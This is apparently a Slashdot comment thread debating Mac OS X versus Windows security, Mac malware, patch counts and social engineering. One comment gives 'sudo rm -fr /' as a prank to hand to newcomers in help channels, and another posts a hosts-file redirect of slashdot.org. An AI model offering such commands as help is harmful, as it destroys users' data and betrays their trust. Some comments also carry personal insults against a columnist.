Sophos is one commercial vendor who distributes an anti-virus client package for the Mac. They also offer their server component for Mac, providing update and remote install/upgrade services. Sophos For OS X. While there are only a few viruses/worms/trojans in the wild at this time that can infect OS X, anti-virus software, for instance on a Mac based file server, can help protect machines running other operating systems.
In this geeks opinion, any OS that defaults the primary user on the system with super user access is going to be at least somewhat more prone to attack. Nasty critters enter systems quite often via way of email attachments, and the common users attraction to shiny things. No scripted-auto-execute-attachment-on-view hack to poorly written email clients is needed, nor is any privilege escalation exploit. The human behind the keyboard will perform that task for us. This is something that is very reasonably taken advantage of with OS X (as with Windows). In a business environment one would hope this has been addressed properly.
As for other remote exploits, SANS top 10 list for Mac OS X.
Mac OS X is far from un-exploitable. It's just not the biggest target on the battlefield... but getting bigger every day
I'm a daily Linux user. I also have a G4 under my desk running OS X, and have quite a bit of respect for the work Apple has done with Darwin (not so much with Aqua).
With Linux, OS X the worst that could happen that way is a destroyed user account.
Not true. Most *nix hacks are compound hacks involving a series of privilege escalation attacks. The root attack surface is much larger from within a user account than from out on the net, so compromising user accounts is a necessary step for many rootkits. Fortunately, since the user account is a way-station to getting more useful work done, that means user account destruction is not on the hacker's to-do list. Unfortunately, it means that unprivileged user-account compromises are very much on the hacker's to-do list.
Even it it was true that destroyed user accounts are the most you have to fear, it is small comfort when most Linux and OS X boxes are single-user machines. At best it spares you from having to reinstall the OS, but after a serious hack, you're probably wise to do that anyway.
-Chad W. Smith http://www.chadwsmith.com/
OS9 was (and still is) a much more secure OS than OSX; it may well be amongst the most secure ever widely deployed by anyone.
Mac OS 9 has no local security at all: there's no mechanism in OS 9 to prevent any remote exploit from becoming a privileged exploit. How do you figure that it was "more secure" than OS X?
I keep hearing that the level of viruses in Microsoft is because of its popularity. If that is the case can someone please point me to the figures that back this up. I'd like to see the figures showing the relationship of an OS's market share to the percentage of viruses. If Microsoft has 90% market share and 70k viruses and Mac has 2% market share does that mean Mac has 1000 to 2000 viruses? Does OSX even have 100 viruses? Does the popularity of an OS invalidate its security model? If Mac had 90% market share would it have 70k viruses. Linux? BSD?
sudo rm -fr /
Give this advice in a 'linux help' irc channel. You'd be amazed at how many people blindly type away. FWIW, every noob should type this command at least once. The lesson learned is *invaluable* (albeit a bit heavy handed) - respect for the power of root.
There was a great piece of software at macworld last week called MacScan. I believe they released there 2nd version of the software at Macworld. It is a anti spyware / keylooger / trojan program and they were giving demo's of certain malicious programs that are out there for mac, It was kindof scary.
You can find information about the software at: http://macscan.securemac.com./ I personally got a copy for myself as it seems there is more and more malicious code being written for the mac.
Which brings us to the tenet:
If you think you are better than anyone,
it means you are lower than everyone.
sudo vi /etc/hosts :wq!
Ctrl-A
199.181.132.250 slashdot.org
Esc
Linux is a damned secure OS, at least as good as MacOS X.
Properly configured a Linux box, a BSD box, and a Mac should be comparably secure.
The problem is that you don't know what "Linux" a Linux is. Most Linux distributions I've used shipped with a lot of dubious software installed and enabled by default. Mac OS X isn't exactly at the level of paranoia of OpenBSD... not everything is turned off by default... but it comes with most of the "relatively paranoid security measures" already taken by Apple before they ship it.
Exploit, infections from not known:3 75,39155837,00.htm
http://news.zdnet.co.uk/internet/security/0,39020
This is to date the closest that Apple has come to the kind of horrorshow that Microsoft created back around 1997 when they integrated IE and Windows Explorer, and it's not very close at all. This hole could never be used to create an automatically propogating worm, the most it does is make social engineering attacks easier.
If social engineering was all we had to watch out for, like it pretty much was back in the early '90s when Microsoft turned the self-propogating email worm from a joke (the "GOOD TIMES" virus hoax) to reality, I'd be a happy camper.
I don't have time to do more research to help your denial, but I would suggest you actually do a bit of research yourself and see that OSX is no more perfect than any other OS. PERIOD.
"More perfect" is improper English. OS X is not perfect. It is more secure than most other OS's, especially as a default install. Your "research" has turned up a trojan (not a virus or worm) that Apple has even made harder to use and which has no exploit code included. This does not qualify as an exploit in the wild.
You also turned up a half-assed rootkit, with no way to get it on the box. This is not a virus or worm or even an exploit of any sort, let alone one in the wild. This is a really poorly written example of what someone might install after they did run a successful exploit.
Finally, you found a decent rootkit, again with no way to get it on the box.
So you found three programs that do what they are supposed to provided you have the permissions and passwords needed to run them. And you call these exploits? You know what? There are almost certainly OS X exploits existing in the wild. They are used by individuals with some skill to compromise specific machines for specific purposes. These exist for pretty much all platforms. They are not, however, worms or viruses, or anything a normal user has to worry about. Trying to equate whatever non-public exploits and a few programs that do what they are intended to with the permissions they are given with the unholy mess that is Windows exploits in the form of worms, viruses, and known hacks is a joke.
The next time you feel like doing some "research" how about starting with some definitions of malware and a basic understanding of what constitutes an exploit. Basically, get a clue.
Use a firewall, backup regularly, and don't open executables from untrusted sources. That's my whole regime.
Before 1997 that was good enough on Windows, too.
If you don't use Internet Explorer or any other application that uses the HTML control to access the Internet, that's probably STILL good enough on Windows. Be careful, because that means you don't use Realplayer, Windows Media Player, Outlook, and a lot of other applications as well as Internet Explorer.
Windows XP 43,672 nasty thangs
Mac OS X 0 nasties
I love the old argument that windows is more vunerable to malware than (OSX/linux/VMS/other) simply because there are more of them out there, so they present a better target for virus writers.
.. well, easy really .. HUMMV's are actually much better protected than tanks .. but because there are more HUMMV's in the field, the evil bastards that have machine guns currently aim them at light vehicles. But dont worry about that - as soon as they put more tanks in the field, machine guns will magically start to be effective against them, and the truth will be known by all.
... this makes the old HUMMV an even safer bet than a tank.
.. so the training costs for tank crews offset the $0 purchase cost.
.. whatcha gonna do ? You have to rely on your own engineers to get it rolling again. On the other hand, factory purchased HUMMVs come with full support - so if you puncture a tire or run out of fuel whilst surrounded by a horde of machete weilding natives - just send an email off to our 24/7 support group, and we will get back to you with some helpful advice by the next business day. "Have you tried turning the engine off and re-starting it sir ?" "The bulletproof glass is letting bullets through ? No worries sir - just hold tight for a while and wait for the next version to be released - we have a radical new type of glass we are testing in our labs, I promise".
What a load of toss.
Ask a Microsoftie the following question, and you should get the following answer :
Q: If you have to drive up against an enemy armed with a machine gun, are you safer in a hummv or a freely available M1 tank ?
A: You might be a bit safer in an M1 tank - at the moment, but the HUMMV is still a better bet. Why you ask ?
Also, HUMMV's offer a wide range of choices for additional armour plating and security measures to make you even safer !. If you are stupid and choose to drive a tank instead, then you will be hard pushed to find ANY third-party additional armour plating on sale for your tank
And even if tanks were available for free (!!!!), HUMMVs are still cheaper when you consider the total cost of ownership - basically anyone can hop into a HUMMv and drive it like a big car, but driving a tank takes a bit of skill
Finally - when your freely available tank throws a track or suffers mechanical problems in the field under fire
Get the facts - HUMMVs are safer than tanks !
So OS X doesn't have any virii because we are all smarter users than our Windows counterparts?
For instance, if an OS needs a firewall in order to be secure, that OS should be deemed 'insecure' until there is no longer a need (i.e. the problems fixed), but it does in no way indicate that all OSes need a firewall to be secure.
If there were a market for such tools for the MAC OS, people would buy and use them (its a curcular arguement, but thats economics for ya). Instead I would measure the relative security of the MAC OS by the lack of need for such tools for day-to-day operation.
Just because one OS has a severe need for such third party tools, it should not indicate all OSes have the same need.
I think you underestimate just how much I just dont care.
The "nasty virus" you link to is bogus; distribution of the virus requires:
/Library/StartupItems /System/Library/StartupItems.
# Admin or physical access (boot from a CD or firewire/usb, ignore permissions on the internal drive).
# Write access to either
# Write access to any existing StartupItem (which is replaced with this script).
# Write access to the rc, crontab, or periodic files.
The effects of this program are pretty nasty, it's true, but installation requires the user to practically install the program him or herself. If I already have root access to a machine, it is a given that I could install whatever malware I wanted, "virus" or no.
The second program you linked to exploits a vulnerability in the VERITAS NetBackup, not in MacOSX; users are only vulnerable if using that program. This program has been patched. A Mac user should be using the most recent version (as one should on any platform) to avoid compromise on this software. Nothing to do with the MacOS.
In other news, oxygen tank expert Bronchito McCougherson chastised non smokers for being too smug thinking they were immune from emphysema and lung cancer.
[sigh] I may as well join on the pig pile.
Safer? I guess, except in the past year Apple released more security and exploit fixes for OSX than Microsoft did for WindowsXP...
So again how is it a safer OS if these exploits existed in the first place?
As others have also noted, there is a disconnect in your logic here. If Apple uncovers 25 potential exploits and patches 23, while MS uncovers 50 and patches 20...well, surely you get the picture.
Apple is a _safer_ (not 100% safe) operating system than WindowsWhatever for a variety of reasons.
* It's harder to exploit because its default behaviors are more secure.
* Its overall design harvests security strengths from its UNIX heritage.
* Yes, its low installed base makes it a less attractive target.
* BUT, so does its superior security model. ^(1)
(1) If you and a friend are running away from a charging bear, you don't have to run faster than the bear--you have to run faster than your friend. Likewise, OS X doesn't have to be 100% secure, it just has to be more secure than Windows.
In this and other posts on this article, you've stretched the bounds of logic and exagerated claims of OS X exploits. Why?
First, I wouldn't characterize user views concerning s/w security regarding OS X as "smugness." That's a myth. Second, it should be more than telling, that after article after article regarding OS X security from pundits and software security vendors alike, the best argument they can make is a pure hypothetical. Third, any discussion of software security must, I repeat, must involve not only the software design of the OS platform as it pertains to security, but also the OS vendor (i.e., Apple, Microsoft, etc.), insomuch as the vendor plays a key role in maintaining security on it's platform. The vendor's role as it pertains to software security is intrinsic and inseparable in any meaningful discussion of platform security.
.wmf incident. On the other hand, Apple has been proactive in maintaining security on it's platform, constantly updating it's system for potential vulnerabilities even though nothing has ever existed in the wild. The most recent version of OS X ("Tiger") featured a raft of new, preventative security features. That's quite a clear departure from Microsoft. Apple, as a company, through it's behavior pertaining to OS security maintenance, has made it clear that if anyone tries to exploit the system, you may find a way but it won't be easy. And if you somehow manage to exploit it, we will shut you down quickly.
In the case of Microsoft, they have been incontestably less than vigilant regarding addressing security lapses in Windows, as recently as the
As an example, the "evil widget" issue that the author of the parent article refers to is a little more telling then he lets on. The issue arose not long after the release of 10.4, but nothing was ever delivered in the wild. Nevertheless, Apple addressed the issue in it's next update to OS X, which at the time was 10.4.2. And this is an example where Apple users do have a right to be smug, as Apple OS X 10.4 users know just how far above and beyond the call of duty Apple's solution was to the theoretical "evil widget."
Make no mistake, when you talk about OS security, the company that makes the OS matters, and in the case of Apple, users would have every reason to be smug.
They can be just as ignorent as windows users, why who could have thought the "Word 2004 public beta" with a "Microsoft icon" that "looked genuine and trustworthy" would wipe out your home directory?
I haven't been hit by an asteroid yet, but I know that I am vulnerable to being hit by one. And I know that, as the population increases, one's chances of being hit increases.
Excuse me. I have to go out and buy a steel umbrella.
You've got great points; don't get your arguments dismissed by being a Word Nazi(TM). Idiomatic expressions are an accepted part of the language and is probably the least problem we have on Slashdot when it comes to understanding posts.
I just wish to express my utterly redundant agreement with your valid but redundant point about linguistic precision being redundant.
Ironically, this post will probably be modded up as "Insightful"...
Blank until
If the worst problem you can find in Mac OS X is that it allows social engineering attacks, well, that means it's even stronger than I'd give it credit for. Social engineering is not an exploit against the OS, it's an exploit against the user. You can't solve THAT technically, at least not until the Singularity when we can apply service packs on our neumonal implants.
Despite elements of truth, I consider such articles to be PC FUD. The subtle message is that the security situation on Mac OS X is NOT really different than Windows and if Mac users were truly responsible they'd be running AV and anti-spyware software and in general be just as worried about security as their PC-using brethren. SO DON'T SWITCH.
Friends, the security situation IS different. Mac users who run software update regularly and don't deliberately open up their systems are probably the safest computer users on the internet, all without having to care very much about security.
In terms of security, Windows is Bagdhad and OS X is Pleasantville. So, while being smug may be rude, it's currently not unjustified. The average Mac user doesn't and shouldn't have to worry as much about security as the average PC user. Anyone who tells you otherwise has an agenda.
I advise against buying antivirus software for the Mac. Antivirus software by its very nature can only reduce the reliability of your system, and since it's purely a responsive mechanism it can actually create a sense of complacency that makes viruses grow faster during the period before the virus is detected and a signature file is distributed.
Simply disabling any auto-execute mechanisms and being careful about who you share digital bodily fluids with works much better.
..and not just over security!
I'm not saying that OS X is perfect, I'm saying that SO FAR, you shouldn't waste time and money on virus protection. Do regular backups of your important data, that is MUCH more effective and protects against other disasters like hardware malfunctions, loss and theft, fire and stupidity.
f ireandstupidity. Snakeoil Antivirusandhardwaremalfunctionandlossandtheftandf ireandstupidity uses our patented trade secret virus, hardware malfunction, loss, theft, fire and stupidity detection engine to effectively stopy any viruses, hardware malfunctions, losses, thefts and fires. And stupidities. Order Snakeoil Antivirusandhardwaremalfunctionandlossandtheftandf ireandstupidity today! (Except in Nebraska.)
We at the Snakeoil Corporation know that, viruses, hardware malfunctions, loss, theft, fire and stupidity are major threats for your precious data. That's why we have released our new revolutionary product, Snakeoil Antivirusandhardwaremalfunctionandlossandtheftand
Legal disclaimer: The software product and users's manual are provided "as is" and without warranty of any kind, either express or implied, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose. In no event will Snakeoil Corp. be liable for any damages, including any lost profits, lost savings, or other incidental or consequential damages arising out of the use, or inability to use Snakeoil Corp. software, even if Snakeoil Corp. or an authorized representative of Snakeoil Corp. has been advised of the possibility of such damages, or for any claim by any other party. Void where prohibited by law. Your actual mileage may vary. For maximum freshness, use before date code indicated. Keep out of the reach of children. Safety goggles may be required during use. All rights reserved. Any resemblance to actual persons, living or dead, is unintentional and purely coincidental. Celebrity voices impersonated.
USE HOT GRITS WITH STATUE OF NATALIE PORTMAN (NAKED AND PETRIFIED)
http://www.us-cert.gov/cas/techalerts/TA06-011A.ht ml
Step 1: The virus first attempts to identify the target machine.
Step 2: Upon doing so and diagnosing apprent weaknesses (???), the virus then packages the relevant position-independant code in an appropriate executable container (ELF for linux, PE for Windows, a.out or unibin for OS-X) and set the entry point. The virus then executes a found exploit (???), causing the offending computer to download the converted virus from the attacking computer
Step 3: Profit
More detail needed on those Step 2 vaguaries. Any virus works great if it can just magically find vulnerabilities and exploits by which to do its work. I'd have a lot more interest in your post if you could identify any specific vulnerabilities or exploits in OS X that would allow that scheme to succeed.
Build a man a fire, he's warm for one night. Set him on fire, and he's warm for the rest of his life.
At the keynote, Jobs announced .Mac had over a million subscribers now. Not a huge percentage of the Mac userbase, but still pretty good.
And with iLife 06 it's more compelling to use for most people than it was before. Plus the bandwith cap is really high and they have great servers so if you want to post stuff that people can see with reasonable speed, it's not a bad solution. And as noted the backup/sync features really are worthwhile - especially if you have two macs.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
No OS is infallible - film at 11.
Wow, how insightful.
As a wise man once said, "There is no step function between 'safe' and 'unsafe'."
We've got tens of thousands of known Windows exploits in the wild, and you've just found maybe one for the Mac, and you're claiming there's therefore no difference in the relative perfection of their two security systems?
So I guess we could have a bunch of crackheaded drug addicts engaging in unprotected sex while rolling around naked in a garbage-strewn back alley littered with rusty used needles and leaking bags of infectuous medical waste, but you'd say (in response to our suggestion that the back-alley sex might not be such a good idea from a health safety perspective) that: since chaste, reclusive people can get sick too, there's NO SUCH THING as a perfectly healthy lifestyle. "Period."
Sure, I realize how easy it is. Are you suggesting, therefore, that it's not worth asking for the password?
That it's fine (or even preferable) for Windows not to ask?
That its failure to ask has nothing to do with the staggeringly high numbers of malware programs which can typically be found installed on the average home PC?
You are also truely a fool if you a salesman convinces you
Aside: I take umbrage with the fact that you'll call someone a fool who has believed a lie for which they cannot be expected to know whether it was a lie or not. In that case, everyone is, has been, or will be, "truely [sic] a fool".
that their product is 100% secure to all security issues.
No one states that Macs are magical, or that they cannot be compromised. The claim is basically that the virus/worm problem with Windows does not exist on the Mac. And they're right, IT DOESN'T.
Regardless of the reason, I know that I am safer today with a Mac than with XP.
Thought experiment: automate two machines, 1 Mac, 1 fully patched, but otherwise default, PC. Script them to browse the web, crawling through links.
Which one is guaranteed to get pwn3d? Which one is currently guaranteed not to?
Next script them to enter their email address to forms that ask for it, and have them both merely run their built-in mail programs, and ask the same question again.
It may be safe today, but we don't know what tomorrow holds.
No, but I don't know if my safe house in my safe neighborhood won't be infiltrated by two LA street gangs and an international terrorist organization tomorrow either. I can, however, look at the way things tend to be, and see that I'm as safe as I can reasonably hope to be, and aren't likely to change in the morning. If things go to hell in a hand-basket tomorrow, I'll deal with it then.
Mac OS X does not do the sorts of things that make worms, viruses, and even hard-to-battle spyware, easy to write for Windows. Windows doesn't *have* to wait for some mythical "tomorrow" for those things.
So, with my Mac, I'll not worry about worms or viruses. If they come (and they are *very* likely to come any time soon), they come. On Windows, they're already here, have been here for a while, and are a nuisance.
So yeah, the Mac is more secure. The bogeyman of "tomorrow" doesn't concern me, which is good, because it shouldn't.
I think the writer has a valid point. OS X may be arguably more inherently secure, but that is to ignore the social engineering aspects. Most Mac users never read the license agreement without hitting 'Accept', they enter their keychain password whenever it is requested without reading or understanding the message, and happily run downloaded shareware without a second thought. Given the routes to an exploit available once any of these have been breached, writing a Mac virus is trivial. Hell, even Cocoa's handy categories make the entire API a backdoor. Writing a virus for the Mac that relies on social engineering is not hard, in fact it's trivially easy, if you learn a bit of Cocoa. Apple even give you the tools for free. It only takes a few users to run a trojan to unleash a Mac virus on all of us, and it's true - we just are not ready to accept it can even happen, let alone know how to deal with it when it does.
That just shows that Mac virus writers are lamerz while Windows virus writers are 1337.
Proof of concept exploit:a g=zdfd.newsfeed .app file extension. I am not amazed.
http://news.zdnet.com/2100-3513_22-5189335.html?t
Feh. It has the
http://daringfireball.net/2004/04/crying_wolf
"The use-mention distinction" is not "enforced here."
If your suggestion is that Mac OS X is not more secure than Windows, you have failed to justify it. If you want to justify it, find vulnerabilities in OS X that are not present in Windows rather than identify vulnerabilities common to the two systems.
"The use-mention distinction" is not "enforced here."
Yeah Mac users are just as dumb as Windows users, but for the life of them they can't seem to figure out a way to open this 'cool_pic.jpg.exe' picture that their 'good friend' keeps sending them.
Part of what has hurt Apple in regards to selling computers is their superiority complex. First it was the mistake of pricing yourself as the BMW of computers and not licensing out the OS. Smack on the head from Bill Gates.
Now the next downfall is the hubris of the MAC community to view all in Apple world perfect and untouchable. Sorry Sally, that neat chrome case has nothing to do with the security of your operating system. The irony is that MAC users are probaly some of the most novice computer users around and need serious security updates, monitoring, security software etc.
"With that in mind, I absolutely agree that Mac users are too smug and that a dedicated malware author could bring many of us to our knees. (Hell, I run as administrator just to save time, despite knowing the risks. It's a gamble, although I keep good backups.) But an OS X (or Linux) malware author would have to be much more skilled than most Windows-targeting skript kiddies to do a lot of damage."
All you do is wait for Apple to release a patch to fix a security issue, reverse engineer the patch, and attack macs. How often do Mac users patch their software?
Vote for Pedro
I remember a complaint recently about how the Microsoft world wasn't "User" oriented, but was more corporate oriented. No one here thought that was much surprising.
On the flip side financial market folks are looking at Apple to see if it can leverage some of its great success in the end-user market toward business.
Perhaps the very thing that made/makes MS successful in the corporate culture is also what makes it more vulnerable to creackers and the difficulties Apple has had getting into the Corporate World also provide roadblocks to crackers.
What do corporations and crackers have in common? They both like to own computers other people are using and control them.
MS made itself wide open to make networking easy -- to make it easy for Domain controllers to control PC's, for Admins to force policies on many users remotely -- to control users at their local consoles. Everything in Windows is about reducing TCO and moving toward zero-administration overhead so 1 cracker, or administrator can control 100's or 1000's of systems (or 10's of 1000's of botnets).
Perhaps I am naive about the remote administration tools of Apple based products, but I don't see them being dropped as easily into a corporation as easily, ready to setup and integrate into the network and have existing network policies easily control them. When I asked an apple-laptop (dunno what kind it was) owner about file sharing, she had no clue how to share them or how to browse local files on my house network available on SMB, CIFS or NFS.
Perhaps the features, that weren't designed into Apple computers that have slowed it down in the Corporation have also slowed down the hackers. That's not to say that MS got it right -- they took the fast, open and dangerous route -- and we see their legacy today. But that's what it has taken to be successful in the business market. Software companies have cared first about product and market, second about quality and security.
MS is now making a big show about security w/o addressing quality, but you can't have secrity w/o quality. Each bug can be a _potential_ exploit waiting for the right conditions, but if a company never bothers with quality, they'll never know how many potential problems they have nor how severe they are.
-l
Modded troll for an obvious joke. Sheesh, so sensitive these folks.
----- If communism is a system where the government owns business, what do you call a system where business owns govern
There have been some gaping holes in MacOS-X browsers that allowed execution of remote code.
I'm not sure that this is an accurate description of reality.
The use of LaunchServices by the browser without human intervention allowed for the exploit of insecure applications. The problem is that LaunchServices is used internally by applications that are never intended to be run with untrusted documents. This is a problem on Windows, and has been a problem on X11-based browsers on UNIX systems as well.
Apple has attempted to address this problem by modifying LaunchServices to alert the user when opening a URL with an application they have previously not used, and by adding warning dialogs to Safari. I believe this is the wrong approach, because it still makes social engineering attacks easier, and because it doesn't help against attacks on components that have already been used to open documents via URLs... and it causes other problems. I had the user interface lock up on me because a screensaver was attempting to use LaunchServices to run an application (legitimately), but I wasn't able to see the warning dialog because the screensaver was running.
The right approach would be for applications registered with LaunchServices to register whether they should be considered "safe" for potentially untrusted content, either via a flag (that defaults to off for existing applications, but which a user can change through Preferences) or by creating a separate WebServices registry. Applications that handle untrusted documents would use this alternate registry or attribute to avoid passing documents to innocent code. This would limit the potential for social engineering without causing problems with applications using LaunchServices internally.
However, the "surface area" of this attack is far smaller than that of Microsoft's active content. It still requires a user to explicitly visit a web page: there's no mechanism for an email message or code surreptitiously inserted into an otherwise innocent web page (say, via embedded HTML in a forum message) to automatically trigger the execution of untrusted code as there is for Outlook and Internet Explorer and other programs that use the Microsoft HTML control.
Automatic execution of native code is the "best" possible attack vector for viruses. That's why Mac viruses used to be so prevalent... it was possible to hide code fragments in the resource fork of documents and have them automatically execute when a document was opened or even displayed in Finder, similar to the way code fragments can be hidden in Windows Metafile format images. This mechanism was increasingly discouraged, and since OS X doesn't support 68000 code segments at all (not even under Classic) it's no longer an issue. Apple has steadily moved away from automatic execution of code, unfortunately Microsoft doesn't seem to have learned that this is a bad thing.
As for Cowhand... it's not an exploit, it's a payload that can be installed in an already compromised computer. Nobody would argue that you can't install backdoors in Mac OS X or any other OS, once a security flaw has been found and exploited, but the existence of a backdoor is not proof of a security flaw... and so far as I know nobody has traced Cowhand's presence back to anything but a social engineering or local (physical access, guessed passwords, etc...) attack.
You've got great points; don't get your arguments dismissed by being a Word Nazi(TM). Idiomatic expressions are an accepted part of the language and is probably the least problem we have on Slashdot when it comes to understanding posts.
Unless specifically asked, I only point out one kind of grammatical/spelling/style mistake. I point out when I can't understand what the writer was trying to say. In this case you'll note I had to use two sentences at the beginning of my reply to address multiple possible meanings of the previous author's ambiguous statement. I don't think this is unreasonable or nazi-esque. In old English, or colonial English, perhaps this had an agreed upon meaning. In modern English it does not. If the writer wanted me to know whether or not he meant "more secure" or "perfectly secure" he should have used understandable English. The purpose of writing is to communicate. If you fail to do that, your writing is flawed.
How did the keylogger start running in userspace? How did it install? If it is a malicious part of a administor-authorized program, someone is swiftly going to get in trouble for distributing malware. I don't think you can run an unauthorized executable in userspace, except maybe for Dashboard Widgets, and they don't get access to ordinary data files.
I may be messing up the technical terms, but I don't think you can have a program running on OSX that wasn't installed by an administrator. Aside from the Kazaa-type phenomena, where massive malware is installed as a stated condition of a "free" installation of desired software, there isn't any way to get that keylogger there in the first place. And a keylogger is clearly illegal, so Kazaa-type tricks will quickly generate visits from the police for the instigators. There's probably a window of risk there, but it's a small window, high up, and throwing things at it may result in a shower of hot oil.
So far, clueless Mac users on OS9 and OSX have been just fine for years and years. I've never seen a Mac problem in my little computer shop that was caused by malware, unless you count Norton Utilities as malware.
I don't get hit running my several shop Windows PCs (yet, anyway). But I have to have use antivirus, a NAT Firewall on my router, MicroSoft Antispyware for 2000 and XP, and take care where I browse with the machines.
I take my home Mac anywhere, and didn't even have a router between it and the internet until I installed a wireless network (I use WEP on it--not invulnerable, but pretty effective). I often use it to check out email viruses and investigate malicious websites to figure out how my customer Windows boxen are getting infected. Four years old, zero problems with malware.
Fundamentalism is a crime against humanity
"I hope I achieved that goal, even if I did upset a lot of people who seem to feel that anything but fawning admiration for Apple is an act of betrayal by an apostate."
More than betrayal, you are verbally burned at the stake, beheaded, and then diced into tiny pieces before being fed to leeches as a puree, if you ever try to criticise apple.
I'm not such a great fan of this guy, but when he complains about windows, which he does in EVERY SINGLE OTHER ARTICLE he's written, I don't bother slashdotting him and writing about him in my blog, between the part where I describe how I went to buy the ingredients for a sandwich and the part where I describe how I made and ate the sandwich. I also don't then put an apple-voodoo curse on him either.
I realise this is probably the worst place to say this, but meh, I think I've got an addiction to getting negative points on slashdot!
Every article he does he has his god damn ugly face in looking all smug and curmudgeonly, like he's trying to say "hey, look at me, I have a column on the bbc website, and that makes me special, just like using a mac does. therefore I am infinitly bettar than you, even though in reality I am actually still a virgin and live with my mother".
I bet he cuts himself and cries in the evenings.
Not to be facetious, but that sounds like a rather accurate description of the Windows world.
... we're Apple's largest advertising force.
If we simply reported facts... how's that going to persuade anybody? We have to use hyperbole and propaganda to get people to pay attention, because Apple won't do it themselves.
Oh, and Macs don't crash, either.
Whops that's "super computer" and X11. See what using m.s. word spell check will get you?
Tired of all the isms, don't exploit people as an employer, or a government, mmmmK?
article is the assumption that Mac users are too smug over security. Where's proof for that ? Just because they're demonstrably safer doesn't mean they're smug over it. Certainly, it's worth discussing the ins and outs of Mac-related safety. However you look at it though, nobody in the world knows nearly enough Mac users to call them generally smug over security issues. How would anybody know ? And anyway, an article that begins with a general ad personas attack, should always be taken with caution. As for the content, others have shown that to be less than accurate. This is just a lame display of under-informed tech journalism trying to impress the ignorant.
Jesus! you must be fun at Pedantic Pursuit.
Noone hears what most of us were telling to Mac users for the past 20 years... Nothing will teach them better than leaving them alone until it bites them in the ass.
It'll have to be the mother of all ass-bitings to make up for 20 years of Mac users gloating about no viruses. It'll wipe that smug smile right off their faces. Hell, maybe this hypothetical future virus will even erase all the extra productivity those jerks have enjoyed for those 20 years, with their easy to use, fully functional computers. It's been 20 years, it'll happen Any Day Now, right?
Or maybe not.
As others have also noted, there is a disconnect in your logic here. If Apple uncovers 25 potential exploits and patches 23, while MS uncovers 50 and patches 20...well, surely you get the picture.
But your logical already fails... You assume Apple patched 92% of their exploits and MS only patched 40% of their exploits.
Where do you base this argument unless you can show me were MS left 60% of any found exploits unpatched...
In fact, find even 50 exploits in XP Post SP2 for the past year...
MS has been very good about patching, and so has Apple...
But go back to MY point... If you had a choice of Boat A) and the captain found 200 holes in it and patched them all and Boat B) where the captain found 50 holes and patched them all, which boat would you assume to be safer?
Both are fully patched, but wouldn't you question the design and safety of the boat that had 200 holes in the first place?
So this is my point, in the last year OSX was boat A, and Windows was boat B...
I wasn't saying neither were unsafe or unpatched, but one HAD to be patched more than the other.
PERIOD.
Now what you suggest...
It's harder to exploit because its default behaviors are more secure.
TRUE - the Root abstraction for Users is a better method than what Windows Uses.
* Its overall design harvests security strengths from its UNIX heritage.
FALSE - Having a *nix heritage means little to NOTHING. In fact MS's NT team specifically designed NT NOT like *nix to avoid the shortcoming and security holes of the *nix model from the early 90s.
Go look up Inside Windows NT, or a book called UNIX-HATERS
Unix Doesn't mean anything, there are good and bad Unix implmentations, period.
PS. Windows has a full Unix Subsystem just like it has what you see as Windows the (Win32) subsystem that you can run natively on the NT kernel. Goto MS and lookup UNIX. It is a free download for Win2k, XP, etc.
* Yes, its low installed base makes it a less attractive target.
This is true, this was also true of WIndows NT back when Win3.1 and Win95 were being hit with a lot of viruses. Many orgainizations moved to the NT platform in the early 90s where this was important as the Win3.x and Win9x viruses failed on NT, and it was not a very big target for hackers of the time.
The same is true of OSX. If OSX becomes more successful as NT did by BECOMING the Only form of Windows, then OSX will have the same growing pains. (Remember Security was built into NT from the begining, a robust C2 level of security even.)
* BUT, so does its superior security model. ^(1)
This is not so much a fact... The Root abstraction is a good model, but underlying that, the security descriptors, file system, and underlying security mechanisms are not any more robust. NT for example has a token and client/server process security model - actually fairly advanced.
Also NTFS is more robust than any file system offered by OSX, expecially where integrity and security are concerned. (Truly go read up on NTFS and NT's internal Security handling.)
Take Care...
Where do you base this argument...
You completely missed the point. I provided an arithmetic case example to make a simple point regarding the insufficient logical basis for your conclusion. I was showing how your "evidence" could be factual--Apple patched more than MS--but that no conclusion regarding the relative security of each operating system may be drawn without additional factual basis. In other words, no one, including you, can draw a logical conclusion from the datapoints you used to draw a conclusion. Period.
Both are fully patched, but wouldn't you question the design and safety of the boat that had 200 holes in the first place?
Maybe. But, wouldn't you agree that the nature and severity of the holes is likely to be at least as meaningul as the quantity of patches? If one boat had 200 minor to moderate leaks but its structure was consistently seaworthy, and the other boat had 50 moderate to major leaks at chronically weak spots in its hull, I'd choose to go to sea in the first boat. No question.
If you want to judge relative security based on comparing lists of patches, you *must* include severity data, including both the potential and realized impact, and the attack vectors.
I wasn't saying neither were unsafe or unpatched, but one HAD to be patched more than the other.
Wrong. The statements "One was patched more than the other," and, "One had to be patched more than the other," are not equivalent. The number of virii, worms, and other attack vectors in the wild for Windows indicates that it was patched less than it "had to be" to be secure.
TRUE - the Root abstraction for Users is a better method than what Windows Uses.
Great! I guess we're done and you've answered your own original question then...
Or not, apparently...
FALSE - Having a *nix heritage means little to NOTHING. In fact MS's NT team specifically designed NT NOT like *nix to avoid the shortcoming and security holes of the *nix model from the early 90s.
"[OS X's] UNIX heritage," and, "all *NIX implementations," are not equivalent either. BSD is pretty universally regarded as a very secure *NIX variant, as well as a extremely secure OS compared to Windows. Hence, OS X benefits from its FreeBSD underpinnings. Period. [See how annoying that is?]
This is true, this was also true of WIndows NT
You know NT. You love NT. You live NT. Fine. I get it.
This is not so much a fact...go read up...
Windows XP and OS X are the current defacto standard for PC and Mac computing, no? XP uses NTFS, which allows permission setting to the file level and encryption. OS X uses a BSD-based filesystem and CDSA to do the same things. XP Home, BTW, doesn't support encryption with NTFS, so...
And what's with XP Home and Simple File Sharing? Can't turn it off? That sucks, eh?
Refocusing now, how do you explain the 10s of thousands of exploit variants affecting Windows to the 10s of exploits affecting OS X if OS X is less secure? Answer, please.
Now, allow me a final anecdote: I just bought a ultra-cheap Dell for home use (XP Home) and set it up with an account for each family member. By default, none of the accounts even had a password. WTF? Firewalling wasn't enabled by default. W.T.F!?
Good thing I have a commercial-class firewall sitting in front of my home net.
You know what also pisses me off though? All the network-aware apps (including ipconfig.exe, ping.exe and tracert.exe) are hanging every time I run them--*except* IE, which will hum around the web just fine. But, if I boot to Safe Mode + Networking, all is well. Gyahhh!
In comparison, my Macs just f'ing worked perfectly out of the box and have never stopped. No viruses. No worms. No root-kits. No spyware beyond normal cookie crap. No wonky network problems. Nothing.
Oh well.
Happy Computing...
